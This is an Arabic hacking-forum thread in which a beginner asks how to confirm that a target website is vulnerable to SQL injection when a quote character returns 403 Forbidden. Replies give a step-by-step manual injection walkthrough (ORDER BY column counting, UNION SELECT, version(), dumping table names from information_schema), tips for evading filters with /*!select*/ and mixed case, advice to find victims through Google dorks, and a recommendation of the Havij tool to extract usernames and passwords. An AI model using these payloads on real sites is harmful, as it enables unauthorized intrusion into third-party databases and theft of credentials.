اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

اي خبير بثغرة سكول يدرعم

اي خبير بثغرة سكول يدرعم


النتائج 1 إلى 10 من 10

الموضوع: اي خبير بثغرة سكول يدرعم

  1. #1
    هكر مبتديء Array الصورة الرمزية M34BHM
    تاريخ التسجيل
    Jan 2014
    الدولة
    المملكة العربية السعودية / الرباض
    المشاركات
    41

    Ham اي خبير بثغرة سكول يدرعم



    سلام عليكم . .. ودي اختصر الموضوع

    اذ جيت احط نقطة الاستعلام لثغرة سكوول في نهاية الرابط يجي فوربدين

    كيف اعرف ان المووقع مصاب .. !

    ارجو المساعدددة



  2. #2
    :: مراقب عام :: Array الصورة الرمزية shhaby
    تاريخ التسجيل
    Nov 2012
    المشاركات
    3,233

    افتراضي رد: اي خبير بثغرة سكول يدرعم

    اخي تضع على الرقم المتغير علامة ( ') اذا طلعلك خطاء يعني الموقع مصاب .
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY title ASC' at line 1
    وفي بعض الاحيان يخرج غير شكل من الخطاء . لكن هذا نوع فقط من الانواع .
    وتكمل باقي الاستغلال اليدوي . بالتوفيق
    ----------------------------------------------


    نقوم باظافة هذه العبارة
    +order+by+
    متبوعة برقم
    هذا فقط لنحصل عدد الاعمدة الموجودة
    نجرب 10 وممكن تكون اكثر

    العبارة التالية
    Unknown column '10' in 'order clause'

    تعني ان هذا العدد من الاعمدة غير موجود لذلك سنحاول
    ان ننقص من عدد الاعمدة حتى يختفي الخطأ

    الان اختفى الخطأ في 7 يعني ان عدد الأعمدة هو 7 طبعا

    نقوم باظافة العبارة التالية
    +union+select+
    متبوعة بعدد العمدة بالتتالي و بينها علامة ,
    1,2,3,4,5,6,7
    و ايضا نقوم باظافة علامة (- )قبل الرقم الذي بعد
    =id
    و في الاخير علامتي( -- )
    لنوقف الاوامر

    الان نعرف ان العمود المصاب هو 4
    و هو الذي سنطبق به اوامر السكيول

    الأمر الأول هو الإستعلام عن اصدار القاعدة
    version()
    نضعه مكان رقم 4

    اصدار القاعدة هو:
    5.5.14

    الان نضع مكان 4 اثنان هذا الأمر
    group_concat(table_name)
    و في اخر الرابط نظيف هذه الأوامر
    +from+information_schema.tables+where+ta*ble_schem a=database()--



    التعديل الأخير تم بواسطة shhaby ; 04-12-2014 الساعة 01:11 PM

  3. #3
    هكر مجتهد Array الصورة الرمزية Sålðe Åddîçt Håhér
    تاريخ التسجيل
    May 2012
    الدولة
    الاردن اولا
    المشاركات
    509

    افتراضي رد: اي خبير بثغرة سكول يدرعم

    طريقتك قديمة استعمل برنامج havji هو يحقن ويتاكد اذا الموقع مصاب او لا ويستخرجبك الباس واليوزر ..
    هاد شرحه http://www.aljyyosh.com/vb/showthread.php?t=38459
    في ناس هون بالمنتدى ما بحب يعلم الميتدئين بكل جديد بظل يرهقهم ويتعبهم بخطوات طويله وصعبه بحب يحتفظ بالجديد لحالو



  4. #4
    :: مراقب عام :: Array الصورة الرمزية shhaby
    تاريخ التسجيل
    Nov 2012
    المشاركات
    3,233

    افتراضي رد: اي خبير بثغرة سكول يدرعم

    اقتباس المشاركة الأصلية كتبت بواسطة Sålðe Åddîçt Håhér مشاهدة المشاركة
    طريقتك قديمة استعمل برنامج havji هو يحقن ويتاكد اذا الموقع مصاب او لا ويستخرجبك الباس واليوزر ..
    هاد شرحه http://www.aljyyosh.com/vb/showthread.php?t=38459
    في ناس هون بالمنتدى ما بحب يعلم الميتدئين بكل جديد بظل يرهقهم ويتعبهم بخطوات طويله وصعبه بحب يحتفظ بالجديد لحالو
    بص يا اخي اني لا ارهق المبتدئين ولا حاجة صحيح يوجد برنامج الهافج لكن صدقني لا تعتمد عليه كليا فقط في بعض المواقع او استخراج لوحة التحكم في بعض الاحيان .
    لكن اتحداك ان يكون برنامج الهافج افضل من الحقن اليدوي... والسبب ان المبرمج لايستطيع ان يخترق جميع المواقع المصابة بثغرة السكيول في برنامجه
    كيف يستطيع البرنامج تخطي
    (
    Not Acceptable ) او ( Forbidden 403) .
    على كل حال ما اعرف انت ليش تشكك في ردي مع العلم اني عاوز اساعد صاحب المشكلة واي سؤال اني حاظر واذا عاوز برنامج الهافج ارفعله البرنامج واضعه له في الموضوع . واخير ( هذه المرة الثانية التي انبهك فيها بالردود تبعك انتبه جيدا لا تتجاوز عندما تعقب على ردودي في المرة الثالثة ؟؟؟؟؟؟)


  5. #5
    هكر مبتديء Array الصورة الرمزية M34BHM
    تاريخ التسجيل
    Jan 2014
    الدولة
    المملكة العربية السعودية / الرباض
    المشاركات
    41

    افتراضي رد: اي خبير بثغرة سكول يدرعم

    اقتباس المشاركة الأصلية كتبت بواسطة shhaby مشاهدة المشاركة
    اخي تضع على الرقم المتغير علامة ( ') اذا طلعلك خطاء يعني الموقع مصاب .
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' ORDER BY title ASC' at line 1
    وفي بعض الاحيان يخرج غير شكل من الخطاء . لكن هذا نوع فقط من الانواع .
    وتكمل باقي الاستغلال اليدوي . بالتوفيق
    ----------------------------------------------


    نقوم باظافة هذه العبارة
    +order+by+
    متبوعة برقم
    هذا فقط لنحصل عدد الاعمدة الموجودة
    نجرب 10 وممكن تكون اكثر

    العبارة التالية
    Unknown column '10' in 'order clause'

    تعني ان هذا العدد من الاعمدة غير موجود لذلك سنحاول
    ان ننقص من عدد الاعمدة حتى يختفي الخطأ

    الان اختفى الخطأ في 7 يعني ان عدد الأعمدة هو 7 طبعا

    نقوم باظافة العبارة التالية
    +union+select+
    متبوعة بعدد العمدة بالتتالي و بينها علامة ,
    1,2,3,4,5,6,7
    و ايضا نقوم باظافة علامة (- )قبل الرقم الذي بعد
    =id
    و في الاخير علامتي( -- )
    لنوقف الاوامر

    الان نعرف ان العمود المصاب هو 4
    و هو الذي سنطبق به اوامر السكيول

    الأمر الأول هو الإستعلام عن اصدار القاعدة
    version()
    نضعه مكان رقم 4

    اصدار القاعدة هو:
    5.5.14

    الان نضع مكان 4 اثنان هذا الأمر
    group_concat(table_name)
    و في اخر الرابط نظيف هذه الأوامر
    +from+information_schema.tables+where+ta*ble_schem a=database()--


    شكر ا على الردد .. لكن ي الغالي !
    انت م فهمت وش اقصدد ..
    اول م ضيف '
    عشان اتاكد فيه ثغرة سكول ولا لا !
    يجي لي فوربدين !
    وش الحل كيف اتاكد اذ فيه ولا لا !
    وكلامك صح هافيج م يقدر يتخطى الفوربدين

    - - - تم التحديث - - -

    التعديل الأخير تم بواسطة M34BHM ; 04-13-2014 الساعة 01:35 AM

  6. #6
    :: مراقب عام :: Array الصورة الرمزية shhaby
    تاريخ التسجيل
    Nov 2012
    المشاركات
    3,233

    افتراضي رد: اي خبير بثغرة سكول يدرعم

    اخي توجد دوركات كثيرة فيها مواقع sql لكن ليس كل المواقع مصابة بالثغرة انت تحط الدورك في قوقل وتخرجلك المواقع .
    تدخل على موقع موقع وتحط بعد الرقم المتغير علامة (') واذا خرجلك خطاء Error يعني الموقع مصاب بالثغرة وتروح تطبق علية الاختراق اما يدوي واما بالهافج . لكن توجد هناك مواقع مرقعين الثغرة تشوف غيرها .
    ---------------------------------------

    تخطي Forbidden 403 اثناء استخراج العامود المصاب

    اضافة الفلتر

    /*! */

    على كلمة

    select

    لتصبح بهذا الشكل

    /*!select*/

    واذا لم تنجح الطريقة العب بكلمة

    select

    لتصبح بهذا الشكل

    /*!SeLeCt*/

    احرف سمول وأحرف كابتل




  7. #7
    هكر مجتهد Array الصورة الرمزية h m e
    تاريخ التسجيل
    Dec 2013
    الدولة
    ام الدنيا
    المشاركات
    354

    افتراضي رد: اي خبير بثغرة سكول يدرعم

    كلام الاح شهاب مظبوط


  8. #8
    هكر مبتديء Array الصورة الرمزية M34BHM
    تاريخ التسجيل
    Jan 2014
    الدولة
    المملكة العربية السعودية / الرباض
    المشاركات
    41

    افتراضي رد: اي خبير بثغرة سكول يدرعم

    شكرا .. لكن لين الحين م فهمتني
    موقع مستهدف .. !
    لمن اضيف له هذي النقطة ( ' )
    دايركت يجي لي Forbidden 403
    هذى لسى بس ابي اتاكد وجالي كذا !
    كيف راح اتاكد انه مصاب !
    ؟


  9. #9
    هكر مجتهد Array الصورة الرمزية h m e
    تاريخ التسجيل
    Dec 2013
    الدولة
    ام الدنيا
    المشاركات
    354

    افتراضي رد: اي خبير بثغرة سكول يدرعم

    مش شرط (')
    ممكن (*)

    ولو مانفعش الاتنين يبقي الموقع مرقع الثغرة



  10. #10
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2012
    المشاركات
    56

    افتراضي رد: اي خبير بثغرة سكول يدرعم

    والله منكم نستفيد مشكورين يا جماعه


المواضيع المتشابهه

  1. مجموعه من المواقع مصابه بثغر سكول اهداء مني لكم
    بواسطة MGNONK في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 2
    آخر مشاركة: 07-12-2013, 07:53 AM
  2. يالله مواقع جديده فيها ثغره سكول
    بواسطة MGNONK في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 2
    آخر مشاركة: 07-03-2013, 07:34 PM
  3. خبير خبير بسرعة البرق
    بواسطة angel2486 في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 1
    آخر مشاركة: 11-14-2010, 12:08 AM
  4. طلب شرح ثغرة سكول
    بواسطة SmAsH_HaCkEr في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 0
    آخر مشاركة: 09-26-2009, 02:22 PM

وجد الزوار هذه الصفحة بالبحث عن:

مواقع مصابه بثغرات سكول اصدار القاعده ٥

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •